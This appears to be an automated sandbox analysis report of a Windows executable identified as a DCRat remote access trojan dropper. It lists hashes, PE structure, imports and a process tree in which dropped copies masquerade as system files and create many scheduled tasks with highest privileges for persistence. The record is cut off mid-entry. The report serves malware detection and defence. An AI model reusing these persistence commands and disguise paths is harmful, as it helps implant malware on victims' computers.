            Preview:zbGj7MbEEn8NKmBoWpKgzQQ85S52eTgTp4BP8B3majFuaK8DzGhekNojKInpQijuGpiPkvqVviFQKghuT2CYvCscQcFzXNV19VnvmtcEaMsCHXZnk3WXgL9D6G8Ip07iMNRz3wIka88iUpU3CcOe18VxVkyguTYjPJz3Gkuyuv6hNbsQvFGMlcqO1ddS7m0HjYSL0axcsauGByk41hvoNM7xclCmGb1I5z7yIhaUSndLrkND2jbZ1L3XbesOYKWRimKL0wvTHaVksvG2Y8tg9cRt6kWozM5HQMnFZCMGyHSa0TpqYz0ZbzRGVbPQZHd5eNTfIBcWvms2K03m5qP9Vgqb5gu8w6rrnX6mAJiXXenyHZ6ehmVt1ej8h1klQdjz5BOw4RmvH2m122UgkPaKk8zJx7FIj6G35y3FLJkQAjl81rGohEBBDYO6LE96MdMKwt6D9OUapJJBW1SF1alf5F0gj64HKoEgXaMIvCpTtk
            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):7.519561804089842
            TrID:
            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            • Win32 Executable (generic) a (10002005/4) 49.97%
            • Generic Win/DOS Executable (2004/3) 0.01%
            • DOS Executable Generic (2002/1) 0.01%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:5U9CuGu1ru.exe
            File size:2'612'447 bytes
            MD5:752748b4c26423542f08b2d3bdd47a42
            SHA1:5c36c76818a268e3ba45ba9de7dab600a66f966e
            SHA256:56ec30189e1468de16c9e8d39908ca3428033e516a6d2fcb843963a4d36c43fe
            SHA512:d5b0604ba7db39fb94f49779326de8c9843c2ce8d7738b4af46028542f7f1685c9903c6961f36f63f4e9c06c7522cb237d9a94598365a44a860542f5bde8687a
            SSDEEP:49152:ubA3ji7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKice:ubI9GfP+WDNl8+azkN2
            TLSH:3AC5CE017E448A21F01D1633C2EF494447B4AC112AE6E76B7EB9376E58123937E2DADF
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
            Icon Hash:1515d4d4442f2d2d
            Entrypoint:0x41ec40
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
            Instruction
            call 00007F55F106FB29h
            jmp 00007F55F106F53Dh
            cmp ecx, dword ptr [0043E668h]
            jne 00007F55F106F6B5h
            ret
            jmp 00007F55F106FCAEh
            int3
            int3
            int3
            int3
            int3
            push ebp
            mov ebp, esp
            push esi
            push dword ptr [ebp+08h]
            mov esi, ecx
            call 00007F55F1062447h
            mov dword ptr [esi], 00435580h
            mov eax, esi
            pop esi
            pop ebp
            retn 0004h
            and dword ptr [ecx+04h], 00000000h
            mov eax, ecx
            and dword ptr [ecx+08h], 00000000h
            mov dword ptr [ecx+04h], 00435588h
            mov dword ptr [ecx], 00435580h
            ret
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            lea eax, dword ptr [ecx+04h]
            mov dword ptr [ecx], 00435568h
            push eax
            call 00007F55F107284Dh
            pop ecx
            ret
            push ebp
            mov ebp, esp
            sub esp, 0Ch
            lea ecx, dword ptr [ebp-0Ch]
            call 00007F55F10623DEh
            push 0043B704h
            lea eax, dword ptr [ebp-0Ch]
            push eax
            call 00007F55F1071F62h
            int3
            push ebp
            mov ebp, esp
            sub esp, 0Ch
            lea ecx, dword ptr [ebp-0Ch]
            call 00007F55F106F654h
            push 0043B91Ch
            lea eax, dword ptr [ebp-0Ch]
            push eax
            call 00007F55F1071F45h
            int3
            jmp 00007F55F1073F93h
            jmp dword ptr [00433260h]
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            push 00421EB0h
            push dword ptr fs:[00000000h]
            Programming Language:
            • [ C ] VS2008 SP1 build 30729
            • [IMP] VS2008 SP1 build 30729
            • [C++] VS2015 UPD3.1 build 24215
            • [EXP] VS2015 UPD3.1 build 24215
            • [RES] VS2015 UPD3 build 24213
            • [LNK] VS2015 UPD3.1 build 24215
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
            IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000xdf98.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x2268.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x310ea0x31200c5bf61bbedb6ad471e9dc6266398e965False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x330000xa6120xa8007980b588d5b28128a2f3c36cabe2ce98False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0x3e0000x237280x1000201530c9e56f172adf2473053298d48fFalse0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .didat0x620000x1880x200c5d41d8f254f69e567595ab94266cfdcFalse0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x630000xdf980xe000d4fc32bf886ae704fea4f916f9d3a59dFalse0.637451171875data6.661378204564432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x710000x22680x2400c7a942b723cb29d9c02f7c611b544b50False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            NameRVASizeTypeLanguageCountryZLIB Complexity
            PNG0x636440xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
            PNG0x6418c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
            RT_ICON0x657380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
            RT_ICON0x65ca00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
            RT_ICON0x665480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
            RT_ICON0x673f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
            RT_ICON0x678580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
            RT_ICON0x689000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
            RT_ICON0x6aea80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
            RT_DIALOG0x6ec1c0x286dataEnglishUnited States0.5092879256965944
            RT_DIALOG0x6eea40x13adataEnglishUnited States0.60828025477707
            RT_DIALOG0x6efe00xecdataEnglishUnited States0.6991525423728814
            RT_DIALOG0x6f0cc0x12edataEnglishUnited States0.5927152317880795
            RT_DIALOG0x6f1fc0x338dataEnglishUnited States0.45145631067961167
            RT_DIALOG0x6f5340x252dataEnglishUnited States0.5757575757575758
            RT_STRING0x6f7880x1e2dataEnglishUnited States0.3900414937759336
            RT_STRING0x6f96c0x1ccdataEnglishUnited States0.4282608695652174
            RT_STRING0x6fb380x1b8dataEnglishUnited States0.45681818181818185
            RT_STRING0x6fcf00x146dataEnglishUnited States0.5153374233128835
            RT_STRING0x6fe380x446dataEnglishUnited States0.340036563071298
            RT_STRING0x702800x166dataEnglishUnited States0.49162011173184356
            RT_STRING0x703e80x152dataEnglishUnited States0.5059171597633136
            RT_STRING0x7053c0x10adataEnglishUnited States0.49624060150375937
            RT_STRING0x706480xbcdataEnglishUnited States0.6329787234042553
            RT_STRING0x707040xd6dataEnglishUnited States0.5747663551401869
            RT_GROUP_ICON0x707dc0x68dataEnglishUnited States0.7019230769230769
            RT_MANIFEST0x708440x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.39786666666666665
            DLLImport
            KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
            gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States
            No network behavior found

            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:19:26:57
            Start date:10/10/2024
            Path:C:\Users\user\Desktop\5U9CuGu1ru.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\5U9CuGu1ru.exe"
            Imagebase:0x800000
            File size:2'612'447 bytes
            MD5 hash:752748B4C26423542F08B2D3BDD47A42
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:2
            Start time:19:26:58
            Start date:10/10/2024
            Path:C:\Windows\SysWOW64\wscript.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe"
            Imagebase:0x420000
            File size:147'456 bytes
            MD5 hash:FF00E0480075B095948000BDC66E81F0
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:3
            Start time:19:26:58
            Start date:10/10/2024
            Path:C:\Windows\SysWOW64\wscript.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\file.vbs"
            Imagebase:0x420000
            File size:147'456 bytes
            MD5 hash:FF00E0480075B095948000BDC66E81F0
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:4
            Start time:19:27:07
            Start date:10/10/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Intodhcp\zSeea0nqF8D7gTEAJAxS8lBZw.bat" "
            Imagebase:0x790000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:5
            Start time:19:27:07
            Start date:10/10/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6d64d0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:6
            Start time:19:27:07
            Start date:10/10/2024
            Path:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe"
            Imagebase:0x50000
            File size:2'295'296 bytes
            MD5 hash:28DD5F145AEB9F6E3D1C60BC1DE330B6
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.2190779031.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.2190779031.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.2194931311.00000000126DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 82%, ReversingLabs
            Reputation:low
            Has exited:true

            Target ID:7
            Start time:19:27:09
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:8
            Start time:19:27:09
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:9
            Start time:19:27:09
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:10
            Start time:19:27:09
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:11
            Start time:19:27:09
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /rl HIGHEST /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:12
            Start time:19:27:09
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /rl HIGHEST /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:13
            Start time:19:27:09
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 5 /tr "'C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:14
            Start time:19:27:09
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:15
            Start time:19:27:09
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 10 /tr "'C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:16
            Start time:19:27:09
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe'" /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:17
            Start time:19:27:09
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe'" /rl HIGHEST /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:18
            Start time:19:27:09
            Start date:10/10/2024
            Path:C:\Users\Public\Desktop\spoolsv.exe
            Wow64 process (32bit):false
            Commandline:C:\Users\Public\Desktop\spoolsv.exe
            Imagebase:0x2a0000
            File size:2'295'296 bytes
            MD5 hash:28DD5F145AEB9F6E3D1C60BC1DE330B6
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000012.00000002.2270383739.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 82%, ReversingLabs
            Has exited:true

            Target ID:19
            Start time:19:27:09
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe'" /rl HIGHEST /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:20
            Start time:19:27:09
            Start date:10/10/2024
            Path:C:\Users\Public\Desktop\spoolsv.exe
            Wow64 process (32bit):false
            Commandline:C:\Users\Public\Desktop\spoolsv.exe
            Imagebase:0xf30000
            File size:2'295'296 bytes
            MD5 hash:28DD5F145AEB9F6E3D1C60BC1DE330B6
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.2270353647.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Has exited:true

            Target ID:21
            Start time:19:27:09
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Recovery\ShellExperienceHost.exe'" /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:22
            Start time:19:27:09
            Start date:10/10/2024
            Path:C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe
            Wow64 process (32bit):false
            Commandline:C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe
            Imagebase:0x670000
            File size:2'295'296 bytes
            MD5 hash:28DD5F145AEB9F6E3D1C60BC1DE330B6
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000016.00000002.2270348613.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 82%, ReversingLabs
            Has exited:true

            Target ID:23
            Start time:19:27:09
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\ShellExperienceHost.exe'" /rl HIGHEST /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:24
            Start time:19:27:09
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\ShellExperienceHost.exe'" /rl HIGHEST /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:25
            Start time:19:27:10
            Start date:10/10/2024
            Path:C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe
            Wow64 process (32bit):false
            Commandline:C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe
            Imagebase:0x2f0000
            File size:2'295'296 bytes
            MD5 hash:28DD5F145AEB9F6E3D1C60BC1DE330B6
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000019.00000002.2269260398.0000000002701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Has exited:true

            Target ID:26
            Start time:19:27:10
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 6 /tr "'C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:27
            Start time:19:27:10
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:29
            Start time:19:27:10
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:30
            Start time:19:27:10
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows portable devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
